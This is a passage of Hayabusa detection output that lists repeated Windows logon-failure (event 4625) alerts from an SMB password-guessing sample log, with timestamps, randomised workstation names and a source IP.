NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: 